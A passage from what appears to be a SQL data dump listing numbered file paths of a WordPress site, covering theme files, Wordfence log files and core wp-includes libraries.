-content/themes/vantage/inc/settings/js/tinycolor.js'),(7579,'wp-content/themes/vantage/inc/settings/js/tinycolor.min.js'),(7580,'wp-content/themes/vantage/inc/settings/settings.php'),(7581,'wp-content/themes/vantage/inc/settings.php'),(7582,'wp-content/themes/vantage/inc/template-tags.php'),(7583,'wp-content/themes/vantage/inc/widgets.php'),(7584,'wp-content/themes/vantage/index.php'),(7585,'wp-content/themes/vantage/js/color-picker.js'),(7586,'wp-content/themes/vantage/js/color-picker.min.js'),(7587,'wp-content/themes/vantage/js/html5.js'),(7588,'wp-content/themes/vantage/js/html5.min.js'),(7589,'wp-content/themes/vantage/js/jquery.fitvids.js'),(7590,'wp-content/themes/vantage/js/jquery.fitvids.min.js'),(7591,'wp-content/themes/vantage/js/jquery.flexslider.js'),(7592,'wp-content/themes/vantage/js/jquery.flexslider.min.js'),(7593,'wp-content/themes/vantage/js/jquery.theme-main.js'),(7594,'wp-content/themes/vantage/js/jquery.theme-main.min.js'),(7595,'wp-content/themes/vantage/js/jquery.touchSwipe.js'),(7596,'wp-content/themes/vantage/js/jquery.touchSwipe.min.js'),(7597,'wp-content/themes/vantage/js/keyboard-image-navigation.js'),(7598,'wp-content/themes/vantage/js/keyboard-image-navigation.min.js'),(7599,'wp-content/themes/vantage/js/selectivizr.js'),(7600,'wp-content/themes/vantage/js/selectivizr.min.js'),(7601,'wp-content/themes/vantage/loop.php'),(7602,'wp-content/themes/vantage/loops/loop-blog.php'),(7603,'wp-content/themes/vantage/loops/loop-carousel.php'),(7604,'wp-content/themes/vantage/loops/loop-circleicon.php'),(7605,'wp-content/themes/vantage/loops/loop-grid.php'),(7606,'wp-content/themes/vantage/loops/loop-slider.php'),(7607,'wp-content/themes/vantage/no-results.php'),(7608,'wp-content/themes/vantage/page.php'),(7609,'wp-content/themes/vantage/parts/footer-vertical.php'),(7610,'wp-content/themes/vantage/parts/footer.php'),(7611,'wp-content/themes/vantage/parts/masthead-logo-in-menu.php'),(7612,'wp-content/themes/vantage/parts/masthead.php'),(7613,'wp-content/themes/vantage/parts/menu-empty.php'),(7614,'wp-content/themes/vantage/parts/menu.php'),(7615,'wp-content/themes/vantage/premium/addons/ajax-comments/ajax-comments.php'),(7616,'wp-content/themes/vantage/premium/addons/ajax-comments/inc/comments.php'),(7617,'wp-content/themes/vantage/premium/addons/ajax-comments/js/ajax-comments.js'),(7618,'wp-content/themes/vantage/premium/addons/ajax-comments/js/ajax-comments.min.js'),(7619,'wp-content/themes/vantage/premium/addons/no-attribution/no-attribution.php'),(7620,'wp-content/themes/vantage/premium/css/codemirror/lib/codemirror.js'),(7621,'wp-content/themes/vantage/premium/css/codemirror/lib/codemirror.min.js'),(7622,'wp-content/themes/vantage/premium/css/codemirror/lib/util/closetag.js'),(7623,'wp-content/themes/vantage/premium/css/codemirror/lib/util/closetag.min.js'),(7624,'wp-content/themes/vantage/premium/css/codemirror/lib/util/css-lint.js'),(7625,'wp-content/themes/vantage/premium/css/codemirror/lib/util/css-lint.min.js'),(7626,'wp-content/themes/vantage/premium/css/codemirror/lib/util/csslint.js'),(7627,'wp-content/themes/vantage/premium/css/codemirror/lib/util/csslint.min.js'),(7628,'wp-content/themes/vantage/premium/css/codemirror/lib/util/dialog.js'),(7629,'wp-content/themes/vantage/premium/css/codemirror/lib/util/dialog.min.js'),(7630,'wp-content/themes/vantage/premium/css/codemirror/lib/util/foldcode.js'),(7631,'wp-content/themes/vantage/premium/css/codemirror/lib/util/foldcode.min.js'),(7632,'wp-content/themes/vantage/premium/css/codemirror/lib/util/formatting.js'),(7633,'wp-content/themes/vantage/premium/css/codemirror/lib/util/formatting.min.js'),(7634,'wp-content/themes/vantage/premium/css/codemirror/lib/util/javascript-hint.js'),(7635,'wp-content/themes/vantage/premium/css/codemirror/lib/util/javascript-hint.min.js'),(7636,'wp-content/themes/vantage/premium/css/codemirror/lib/util/lint.js'),(7637,'wp-content/themes/vantage/premium/css/codemirror/lib/util/lint.min.js'),(7638,'wp-content/themes/vantage/premium/css/codemirror/lib/util/loadmode.js'),(7639,'wp-content/themes/vantage/premium/css/codemirror/lib/util/loadmode.min.js'),(7640,'wp-content/themes/vantage/premium/css/codemirror/lib/util/match-highlighter.js'),(7641,'wp-content/themes/vantage/premium/css/codemirror/lib/util/match-highlighter.min.js'),(7642,'wp-content/themes/vantage/premium/css/codemirror/lib/util/multiplex.js'),(7643,'wp-content/themes/vantage/premium/css/codemirror/lib/util/multiplex.min.js'),(7644,'wp-content/themes/vantage/premium/css/codemirror/lib/util/overlay.js'),(7645,'wp-content/themes/vantage/premium/css/codemirror/lib/util/overlay.min.js'),(7646,'wp-content/themes/vantage/premium/css/codemirror/lib/util/pig-hint.js'),(7647,'wp-content/themes/vantage/premium/css/codemirror/lib/util/pig-hint.min.js'),(7648,'wp-content/themes/vantage/premium/css/codemirror/lib/util/runmode.js'),(7649,'wp-content/themes/vantage/premium/css/codemirror/lib/util/runmode.min.js'),(7650,'wp-content/themes/vantage/premium/css/codemirror/lib/util/search.js'),(7651,'wp-content/themes/vantage/premium/css/codemirror/lib/util/search.min.js'),(7652,'wp-content/themes/vantage/premium/css/codemirror/lib/util/searchcursor.js'),(7653,'wp-content/themes/vantage/premium/css/codemirror/lib/util/searchcursor.min.js'),(7654,'wp-content/themes/vantage/premium/css/codemirror/lib/util/simple-hint.js'),(7655,'wp-content/themes/vantage/premium/css/codemirror/lib/util/simple-hint.min.js'),(7656,'wp-content/themes/vantage/premium/css/codemirror/mode/css/css.js'),(7657,'wp-content/themes/vantage/premium/css/codemirror/mode/css/css.min.js'),(7658,'wp-content/themes/vantage/premium/css/css.php'),(7659,'wp-content/themes/vantage/premium/css/js/admin.js'),(7660,'wp-content/themes/vantage/premium/css/js/admin.min.js'),(7661,'wp-content/themes/vantage/premium/css/page.php'),(7662,'wp-content/themes/vantage/premium/premium.php'),(7663,'wp-content/themes/vantage/premium/share/share.php'),(7664,'wp-content/themes/vantage/premium/themes/origami.php'),(7665,'wp-content/themes/vantage/premium/themes/vantage.php'),(7666,'wp-content/themes/vantage/premium/update/update.php'),(7667,'wp-content/themes/vantage/premium/widgets/js/map.js'),(7668,'wp-content/themes/vantage/premium/widgets/js/map.min.js'),(7669,'wp-content/themes/vantage/premium/widgets/widgets.php'),(7670,'wp-content/themes/vantage/search.php'),(7671,'wp-content/themes/vantage/searchform.php'),(7672,'wp-content/themes/vantage/sidebar-shop.php'),(7673,'wp-content/themes/vantage/sidebar.php'),(7674,'wp-content/themes/vantage/single.php'),(7675,'wp-content/themes/vantage/slider/demo.php'),(7676,'wp-content/themes/vantage/templates/template-full-notitle.php'),(7677,'wp-content/themes/vantage/templates/template-full.php'),(7678,'wp-content/themes/vantage/tour/tour.php'),(7679,'wp-content/themes/vantage-child/functions.php'),(7680,'wp-content/themes/zerif-lite/404.php'),(7681,'wp-content/themes/zerif-lite/CHANGELOG.md'),(7682,'wp-content/themes/zerif-lite/archive-download.php'),(7683,'wp-content/themes/zerif-lite/archive.php'),(7684,'wp-content/themes/zerif-lite/class-tgm-plugin-activation.php'),(7685,'wp-content/themes/zerif-lite/comments.php'),(7686,'wp-content/themes/zerif-lite/content-archive-download.php'),(7687,'wp-content/themes/zerif-lite/content-frontpage.php'),(7688,'wp-content/themes/zerif-lite/content-large.php'),(7689,'wp-content/themes/zerif-lite/content-none.php'),(7690,'wp-content/themes/zerif-lite/content-page-no-title.php'),(7691,'wp-content/themes/zerif-lite/content-page.php'),(7692,'wp-content/themes/zerif-lite/content-single-download.php'),(7693,'wp-content/themes/zerif-lite/content-single.php'),(7694,'wp-content/themes/zerif-lite/content.php'),(7695,'wp-content/themes/zerif-lite/css/bootstrap-rtl.css'),(7696,'wp-content/themes/zerif-lite/css/bootstrap.css'),(7697,'wp-content/themes/zerif-lite/css/custom-editor-style.css'),(7698,'wp-content/themes/zerif-lite/css/font-awesome.css'),(7699,'wp-content/themes/zerif-lite/css/font-awesome.min.css'),(7700,'wp-content/themes/zerif-lite/css/ie.css'),(7701,'wp-content/themes/zerif-lite/css/responsive.css'),(7702,'wp-content/themes/zerif-lite/css/style-mobile.css'),(7703,'wp-content/themes/zerif-lite/css/zerif_customizer_custom_css.css'),(7704,'wp-content/themes/zerif-lite/fonts/FontAwesome.otf'),(7705,'wp-content/themes/zerif-lite/fonts/fontawesome-webfont.eot'),(7706,'wp-content/themes/zerif-lite/fonts/fontawesome-webfont.svg'),(7707,'wp-content/themes/zerif-lite/fonts/fontawesome-webfont.ttf'),(7708,'wp-content/themes/zerif-lite/fonts/fontawesome-webfont.woff'),(7709,'wp-content/themes/zerif-lite/fonts/fontawesome-webfont.woff2'),(7710,'wp-content/themes/zerif-lite/footer.php'),(7711,'wp-content/themes/zerif-lite/front-page.php'),(7712,'wp-content/themes/zerif-lite/functions.php'),(7713,'wp-content/themes/zerif-lite/header.php'),(7714,'wp-content/themes/zerif-lite/home.php'),(7715,'wp-content/themes/zerif-lite/images/background1.jpg'),(7716,'wp-content/themes/zerif-lite/images/background2.png'),(7717,'wp-content/themes/zerif-lite/images/bg.jpg'),(7718,'wp-content/themes/zerif-lite/images/blank-latestposts.png'),(7719,'wp-content/themes/zerif-lite/images/ccc.png'),(7720,'wp-content/themes/zerif-lite/images/clients1.png'),(7721,'wp-content/themes/zerif-lite/images/clients2.png'),(7722,'wp-content/themes/zerif-lite/images/clients3.png'),(7723,'wp-content/themes/zerif-lite/images/clients4.png'),(7724,'wp-content/themes/zerif-lite/images/clients5.png'),(7725,'wp-content/themes/zerif-lite/images/envelope4-green.png'),(7726,'wp-content/themes/zerif-lite/images/left-arrow.png'),(7727,'wp-content/themes/zerif-lite/images/lines-dark.png'),(7728,'wp-content/themes/zerif-lite/images/lines.png'),(7729,'wp-content/themes/zerif-lite/images/loading.gif'),(7730,'wp-content/themes/zerif-lite/images/logo-themeisle.png'),(7731,'wp-content/themes/zerif-lite/images/logo.png'),(7732,'wp-content/themes/zerif-lite/images/map25-redish.png'),(7733,'wp-content/themes/zerif-lite/images/menu-icon.png'),(7734,'wp-content/themes/zerif-lite/images/onepirate.png'),(7735,'wp-content/themes/zerif-lite/images/parallax.png'),(7736,'wp-content/themes/zerif-lite/images/responsiveboat.png'),(7737,'wp-content/themes/zerif-lite/images/right-arrow.png'),(7738,'wp-content/themes/zerif-lite/images/search_icon.png'),(7739,'wp-content/themes/zerif-lite/images/team1.png'),(7740,'wp-content/themes/zerif-lite/images/team2.png'),(7741,'wp-content/themes/zerif-lite/images/team3.png'),(7742,'wp-content/themes/zerif-lite/images/team4.png'),(7743,'wp-content/themes/zerif-lite/images/telephone65-blue.png'),(7744,'wp-content/themes/zerif-lite/images/testimonial1.jpg'),(7745,'wp-content/themes/zerif-lite/images/testimonial2.jpg'),(7746,'wp-content/themes/zerif-lite/images/testimonial3.jpg'),(7747,'wp-content/themes/zerif-lite/images/ti-logo.png'),(7748,'wp-content/themes/zerif-lite/images/tr-black-1px.png'),(7749,'wp-content/themes/zerif-lite/images/woo.png'),(7750,'wp-content/themes/zerif-lite/images/woostars.png'),(7751,'wp-content/themes/zerif-lite/images/zblackbeard.png'),(7752,'wp-content/themes/zerif-lite/images/zerius.png'),(7753,'wp-content/themes/zerif-lite/images/zifer-child.png'),(7754,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/css/welcome.css'),(7755,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/css/welcome_customizer.css'),(7756,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/ajax-loader.gif'),(7757,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/onepirate.jpg'),(7758,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/responsiveboat.png'),(7759,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/zblackbeard.jpg'),(7760,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/zerius.jpg'),(7761,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/zifer-child.jpg'),(7762,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/js/welcome.js'),(7763,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/js/welcome_customizer.js'),(7764,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/actions-required.php'),(7765,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/changelog.php'),(7766,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/child-themes.php'),(7767,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/free_pro.php'),(7768,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/getting-started.php'),(7769,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/github.php'),(7770,'wp-content/themes/zerif-lite/inc/admin/welcome-screen/welcome-screen.php'),(7771,'wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/class-customizer-theme-info-control.php'),(7772,'wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/class-customizer-theme-info-root.php'),(7773,'wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/class-zerif-customize-theme-info-main.php'),(7774,'wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/class-zerif-customize-upsell-section.php'),(7775,'wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/css/style.css'),(7776,'wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/js/zerif-upsell-customize-controls.js'),(7777,'wp-content/themes/zerif-lite/inc/customizer-info/class/class-zerif-customize-upsell-features.php'),(7778,'wp-content/themes/zerif-lite/inc/customizer-info/class/class-zerif-customize-upsell-pro.php'),(7779,'wp-content/themes/zerif-lite/inc/customizer-info/class/class-zerif-customize-upsell.php'),(7780,'wp-content/themes/zerif-lite/inc/customizer-info/css/customizer-info.css'),(7781,'wp-content/themes/zerif-lite/inc/customizer-info/js/customizer-info-controls.js'),(7782,'wp-content/themes/zerif-lite/inc/customizer.php'),(7783,'wp-content/themes/zerif-lite/inc/extras.php'),(7784,'wp-content/themes/zerif-lite/inc/hooks.php'),(7785,'wp-content/themes/zerif-lite/inc/jetpack.php'),(7786,'wp-content/themes/zerif-lite/inc/template-tags.php'),(7787,'wp-content/themes/zerif-lite/index.php'),(7788,'wp-content/themes/zerif-lite/js/bootstrap.js'),(7789,'wp-content/themes/zerif-lite/js/bootstrap.min.js'),(7790,'wp-content/themes/zerif-lite/js/customizer.js'),(7791,'wp-content/themes/zerif-lite/js/html5.js'),(7792,'wp-content/themes/zerif-lite/js/jquery.knob.js'),(7793,'wp-content/themes/zerif-lite/js/parallax.js'),(7794,'wp-content/themes/zerif-lite/js/respond.js'),(7795,'wp-content/themes/zerif-lite/js/respond.min.js'),(7796,'wp-content/themes/zerif-lite/js/scrollReveal.js'),(7797,'wp-content/themes/zerif-lite/js/smoothscroll.js'),(7798,'wp-content/themes/zerif-lite/js/widget-media.js'),(7799,'wp-content/themes/zerif-lite/js/zerif.js'),(7800,'wp-content/themes/zerif-lite/js/zerif_customizer.js'),(7801,'wp-content/themes/zerif-lite/js/zerif_multiple_panels.js'),(7802,'wp-content/themes/zerif-lite/languages/es_ES.mo'),(7803,'wp-content/themes/zerif-lite/languages/es_ES.po'),(7804,'wp-content/themes/zerif-lite/languages/pl_PL.mo'),(7805,'wp-content/themes/zerif-lite/languages/pl_PL.po'),(7806,'wp-content/themes/zerif-lite/languages/ro_RO.mo'),(7807,'wp-content/themes/zerif-lite/languages/ro_RO.po'),(7808,'wp-content/themes/zerif-lite/languages/zerif-lite.pot'),(7809,'wp-content/themes/zerif-lite/license.txt'),(7810,'wp-content/themes/zerif-lite/page.php'),(7811,'wp-content/themes/zerif-lite/readme.md'),(7812,'wp-content/themes/zerif-lite/rtl.css'),(7813,'wp-content/themes/zerif-lite/screenshot.png'),(7814,'wp-content/themes/zerif-lite/search.php'),(7815,'wp-content/themes/zerif-lite/sections/about_us.php'),(7816,'wp-content/themes/zerif-lite/sections/big_title.php'),(7817,'wp-content/themes/zerif-lite/sections/latest_news.php'),(7818,'wp-content/themes/zerif-lite/sections/our_focus.php'),(7819,'wp-content/themes/zerif-lite/sections/our_team.php'),(7820,'wp-content/themes/zerif-lite/sections/ribbon_with_bottom_button.php'),(7821,'wp-content/themes/zerif-lite/sections/ribbon_with_right_button.php'),(7822,'wp-content/themes/zerif-lite/sections/testimonials.php'),(7823,'wp-content/themes/zerif-lite/sidebar.php'),(7824,'wp-content/themes/zerif-lite/single-download.php'),(7825,'wp-content/themes/zerif-lite/single.php'),(7826,'wp-content/themes/zerif-lite/style.css'),(7827,'wp-content/themes/zerif-lite/template-blog-large.php'),(7828,'wp-content/themes/zerif-lite/template-blog.php'),(7829,'wp-content/themes/zerif-lite/template-frontpage.php'),(7830,'wp-content/themes/zerif-lite/template-fullwidth-no-title.php'),(7831,'wp-content/themes/zerif-lite/template-fullwidth.php'),(7832,'wp-content/themes/zerif-lite/themeisle-hash.json'),(7833,'wp-content/themes/zerif-lite/ti-about-page/class-ti-about-page.php'),(7834,'wp-content/themes/zerif-lite/ti-about-page/css/ti_about_page_css.css'),(7835,'wp-content/themes/zerif-lite/ti-about-page/images/ajax-loader.gif'),(7836,'wp-content/themes/zerif-lite/ti-about-page/images/logo.png'),(7837,'wp-content/themes/zerif-lite/ti-about-page/images/neve.png'),(7838,'wp-content/themes/zerif-lite/ti-about-page/images/placeholder_plugin.png'),(7839,'wp-content/themes/zerif-lite/ti-about-page/js/ti_about_page_scripts.js'),(7840,'wp-content/themes/zerif-lite/ti-customizer-notify/class-ti-customizer-notify.php'),(7841,'wp-content/themes/zerif-lite/ti-customizer-notify/css/ti-customizer-notify-customizer.css'),(7842,'wp-content/themes/zerif-lite/ti-customizer-notify/js/ti-customizer-notify-customizer.js'),(7843,'wp-content/themes/zerif-lite/ti-customizer-notify/ti-customizer-notify-section.php'),(7844,'wp-content/themes/zerif-lite/ti-customizer-notify/ti-notify-system-checks.php'),(7845,'wp-content/themes/zerif-lite/ti-prevdem/img/1.jpg'),(7846,'wp-content/themes/zerif-lite/ti-prevdem/img/10.jpg'),(7847,'wp-content/themes/zerif-lite/ti-prevdem/img/2.jpg'),(7848,'wp-content/themes/zerif-lite/ti-prevdem/img/3.jpg'),(7849,'wp-content/themes/zerif-lite/ti-prevdem/img/4.jpg'),(7850,'wp-content/themes/zerif-lite/ti-prevdem/img/5.jpg'),(7851,'wp-content/themes/zerif-lite/ti-prevdem/img/6.jpg'),(7852,'wp-content/themes/zerif-lite/ti-prevdem/img/7.jpg'),(7853,'wp-content/themes/zerif-lite/ti-prevdem/img/8.jpg'),(7854,'wp-content/themes/zerif-lite/ti-prevdem/img/9.jpg'),(7855,'wp-content/themes/zerif-lite/ti-prevdem/init-prevdem.php'),(7856,'wp-content/themes/zerif-lite/ti-prevdem/prevdem-functions.php'),(7857,'wp-content/themes/zerif-lite/vendor/autoload.php'),(7858,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/LICENSE'),(7859,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-endpoints.php'),(7860,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-feedback-deactivate.php'),(7861,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-feedback-factory.php'),(7862,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-feedback-review.php'),(7863,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-feedback-translate.php'),(7864,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-feedback.php'),(7865,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-licenser.php'),(7866,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-loader.php'),(7867,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-logger.php'),(7868,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-notification-manager.php'),(7869,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-product.php'),(7870,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-rollback.php'),(7871,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-widget-dashboard-blog.php'),(7872,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-widget.php'),(7873,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/class-themeisle-sdk-widgets-factory.php'),(7874,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/composer.json'),(7875,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/index.php'),(7876,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/load.php'),(7877,'wp-content/themes/zerif-lite/vendor/codeinwp/themeisle-sdk/start.php'),(7878,'wp-content/themes/zerif-lite/vendor/composer/ClassLoader.php'),(7879,'wp-content/themes/zerif-lite/vendor/composer/LICENSE'),(7880,'wp-content/themes/zerif-lite/vendor/composer/autoload_classmap.php'),(7881,'wp-content/themes/zerif-lite/vendor/composer/autoload_files.php'),(7882,'wp-content/themes/zerif-lite/vendor/composer/autoload_namespaces.php'),(7883,'wp-content/themes/zerif-lite/vendor/composer/autoload_psr4.php'),(7884,'wp-content/themes/zerif-lite/vendor/composer/autoload_real.php'),(7885,'wp-content/themes/zerif-lite/vendor/composer/installed.json'),(7886,'wp-content/themes/zerif-lite/woocommerce.php'),(7887,'wp-content/themes/zerif-lite/wpglobus-config.json'),(7888,'wp-content/themes/zerif-lite/wpml-config.xml'),(7889,'wp-content/updraft/index.html'),(7890,'wp-content/uploads/wp-clone/index.html'),(7891,'wp-content/wflogs/attack-data.php'),(7892,'wp-content/wflogs/config-livewaf.php'),(7893,'wp-content/wflogs/config-synced.php'),(7894,'wp-content/wflogs/config-transient.php'),(7895,'wp-content/wflogs/config.php'),(7896,'wp-content/wflogs/ips.php'),(7897,'wp-content/wflogs/rules.php'),(7898,'wp-content/wflogs/template.php'),(7899,'wp-cron.php'),(7900,'wp-includes/.htaccess'),(7901,'wp-includes/ID3/getid3.lib.php'),(7902,'wp-includes/ID3/getid3.php'),(7903,'wp-includes/ID3/license.commercial.txt'),(7904,'wp-includes/ID3/license.txt'),(7905,'wp-includes/ID3/module.audio-video.asf.php'),(7906,'wp-includes/ID3/module.audio-video.flv.php'),(7907,'wp-includes/ID3/module.audio-video.matroska.php'),(7908,'wp-includes/ID3/module.audio-video.quicktime.php'),(7909,'wp-includes/ID3/module.audio-video.riff.php'),(7910,'wp-includes/ID3/module.audio.ac3.php'),(7911,'wp-includes/ID3/module.audio.dts.php'),(7912,'wp-includes/ID3/module.audio.flac.php'),(7913,'wp-includes/ID3/module.audio.mp3.php'),(7914,'wp-includes/ID3/module.audio.ogg.php'),(7915,'wp-includes/ID3/module.tag.apetag.php'),(7916,'wp-includes/ID3/module.tag.id3v1.php'),(7917,'wp-includes/ID3/module.tag.id3v2.php'),(7918,'wp-includes/ID3/module.tag.lyrics3.php'),(7919,'wp-includes/ID3/readme.txt'),(7920,'wp-includes/IXR/class-IXR-base64.php'),(7921,'wp-includes/IXR/class-IXR-client.php'),(7922,'wp-includes/IXR/class-IXR-clientmulticall.php'),(7923,'wp-includes/IXR/class-IXR-date.php'),(7924,'wp-includes/IXR/class-IXR-error.php'),(7925,'wp-includes/IXR/class-IXR-introspectionserver.php'),(7926,'wp-includes/IXR/class-IXR-message.php'),(7927,'wp-includes/IXR/class-IXR-request.php'),(7928,'wp-includes/IXR/class-IXR-server.php'),(7929,'wp-includes/IXR/class-IXR-value.php'),(7930,'wp-includes/Requests/Auth/Basic.php'),(7931,'wp-includes/Requests/Auth.php'),(7932,'wp-includes/Requests/Cookie/Jar.php'),(7933,'wp-includes/Requests/Cookie.php'),(7934,'wp-includes/Requests/Exception/HTTP/304.php'),(7935,'wp-includes/Requests/Exception/HTTP/305.php'),(7936,'wp-includes/Requests/Exception/HTTP/306.php'),(7937,'wp-includes/Requests/Exception/HTTP/400.php'),(7938,'wp-includes/Requests/Exception/HTTP/401.php'),(7939,'wp-includes/Requests/Exception/HTTP/402.php'),(7940,'wp-includes/Requests/Exception/HTTP/403.php'),(7941,'wp-includes/Requests/Exception/HTTP/404.php'),(7942,'wp-includes/Requests/Exception/HTTP/405.php'),(7943,'wp-includes/Requests/Exception/HTTP/406.php'),(7944,'wp-includes/Requests/Exception/HTTP/407.php'),(7945,'wp-includes/Requests/Exception/HTTP/408.php'),(7946,'wp-includes/Requests/Exception/HTTP/409.php'),(7947,'wp-includes/Requests/Exception/HTTP/410.php'),(7948,'wp-includes/Requests/Exception/HTTP/411.php'),(7949,'wp-includes/Requests/Exception/HTTP/412.php'),(7950,'wp-includes/Requests/Exception/HTTP/413.php'),(7951,'wp-includes/Requests/Exception/HTTP/414.php'),(7952,'wp-includes/Requests/Exception/HTTP/415.php'),(7953,'wp-includes/Requests/Exception/HTTP/416.php'),(7954,'wp-includes/Requests/Exception/HTTP/417.php'),(7955,'wp-includes/Requests/Exception/HTTP/418.php'),(7956,'wp-includes/Requests/Exception/HTTP/428.php'),(7957,'wp-includes/Requests/Exception/HTTP/429.php'),(7958,'wp-includes/Requests/Exception/HTTP/431.php'),(7959,'wp-includes/Requests/Exception/HTTP/500.php'),(7960,'wp-includes/Requests/Exception/HTTP/501.php'),(7961,'wp-includes/Requests/Exception/HTTP/502.php'),(7962,'wp-includes/Requests/Exception/HTTP/503.php'),(7963,'wp-includes/Requests/Exception/HTTP/504.php'),(7964,'wp-includes/Requests/Exception/HTTP/505.php'),(7965,'wp-includes/Requests/Exception/HTTP/511.php'),(7966,'wp-includes/Requests/Exception/HTTP/Unknown.php'),(7967,'wp-includes/Requests/Exception/HTTP.php'),(7968,'wp-includes/Requests/Exception/Transport/cURL.php'),(7969,'wp-includes/Requests/Exception/Transport.php'),(7970,'wp-includes/Requests/Exception.php'),(7971,'wp-includes/Requests/Hooker.php'),(7972,'wp-includes/Requests/Hooks.php'),(7973,'wp-includes/Requests/IDNAEncoder.php'),(7974,'wp-includes/Requests/IPv6.php'),(7975,'wp-includes/Requests/IRI.php'),(7976,'wp-includes/Requests/Proxy/HTTP.php'),(7977,'wp-includes/Requests/Proxy.php'),(7978,'wp-includes/Requests/Response/Headers.php'),(7979,'wp-includes/Requests/Response.php'),(7980,'wp-includes/Requests/SSL.php'),(7981,'wp-includes/Requests/Session.php'),(7982,'wp-includes/Requests/Transport/cURL.php'),(7983,'wp-includes/Requests/Transport/fsockopen.php'),(7984,'wp-includes/Requests/Transport.php'),(7985,'wp-includes/Requests/Utility/CaseInsensitiveDictionary.php'),(7986,'wp-includes/Requests/Utility/FilteredIterator.php'),(7987,'wp-includes/SimplePie/Author.php'),(7988,'wp-includes/SimplePie/Cache/Base.php'),(7989,'wp-includes/SimplePie/Cache/DB.php'),(7990,'wp-includes/SimplePie/Cache/File.php'),(7991,'wp-includes/SimplePie/Cache/Memcache.php'),(7992,'wp-includes/SimplePie/Cache/MySQL.php'),(7993,'wp-includes/SimplePie/Cache.php'),(7994,'wp-includes/SimplePie/Caption.php'),(7995,'wp-includes/SimplePie/Category.php'),(7996,'wp-includes/SimplePie/Content/Type/Sniffer.php'),(7997,'wp-includes/SimplePie/Copyright.php'),(7998,'wp-includes/SimplePie/Core.php'),(7999,'wp-includes/SimplePie/Credit.php'),(8000,'wp-includes/SimplePie/Decode/HTML/Entities.php'),(8001,'wp-includes/SimplePie/Enclosure.php'),(8002,'wp-includes/SimplePie/Exception.php'),(8003,'wp-includes/SimplePie/File.php'),(8004,'wp-includes/SimplePie/HTTP/Parser.php'),(8005,'wp-includes/SimplePie/IRI.php'),(8006,'wp-includes/SimplePie/Item.php'),(8007,'wp-includes/SimplePie/Locator.php'),(8008,'wp-includes/SimplePie/Misc.php'),(8009,'wp-includes/SimplePie/Net/IPv6.php'),(8010,'wp-includes/SimplePie/Parse/Date.php'),(8011,'wp-includes/SimplePie/Parser.php'),(8012,'wp-includes/SimplePie/Rating.php'),(8013,'wp-includes/SimplePie/Registry.php'),(8014,'wp-includes/SimplePie/Restriction.php'),(8015,'wp-includes/SimplePie/Sanitize.php'),(8016,'wp-includes/SimplePie/Source.php'),(8017,'wp-includes/SimplePie/XML/Declaration/Parser.php'),(8018,'wp-includes/SimplePie/gzdecode.php'),(8019,'wp-includes/Text/Diff/Engine/native.php'),(8020,'wp-includes/Text/Diff/Engine/shell.php'),(8021,'wp-includes/Text/Diff/Engine/string.php'),(8022,'wp-includes/Text/Diff/Engine/xdiff.php'),(8023,'wp-includes/Text/Diff/Renderer/inline.php'),(8024,'wp-includes/Text/Diff/Renderer.php'),(8025,'wp-includes/Text/Diff.php'),(8026,'wp-includes/admin-bar.php'),(8027,'wp-includes/assets/script-loader-packages.php'),(8028,'wp-includes/atomlib.php'),(8029,'wp-includes/author-template.php'),(8030,'wp-includes/blocks/archives.php'),(8031,'wp-includes/blocks/block.php'),(8032,'wp-includes/blocks/calendar.php'),(8033,'wp-includes/blocks/categories.php'),(8034,'wp-includes/blocks/latest-comments.php'),(8035,'wp-includes/blocks/latest-posts.php'),(8036,'wp-includes/blocks/rss.php'),(8037,'wp-includes/blocks/search.php'),(8038,'wp-includes/blocks/shortcode/block.json'),(8039,'wp-includes/blocks/shortcode.php'),(8040,'wp-includes/blocks/social-link/block.json'),(8041,'wp-includes/blocks/social-link.php'),(8042,'wp-includes/blocks/tag-cloud.php'),(8043,'wp-includes/blocks.php'),(8044,'wp-includes/bookmark-template.php'),(8